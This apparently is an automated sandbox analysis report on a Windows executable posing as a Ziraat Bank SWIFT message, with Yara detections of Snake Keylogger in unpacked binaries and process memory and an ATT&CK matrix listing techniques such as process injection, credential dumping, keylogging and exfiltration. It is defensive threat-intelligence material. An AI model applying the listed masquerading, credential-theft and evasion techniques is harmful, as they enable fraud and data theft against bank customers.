Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4521556409.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4519134868.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4521556409.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5548, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ziraat Bankasi Swift Mesaji.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Ziraat Bankasi Swift Mesaji.exe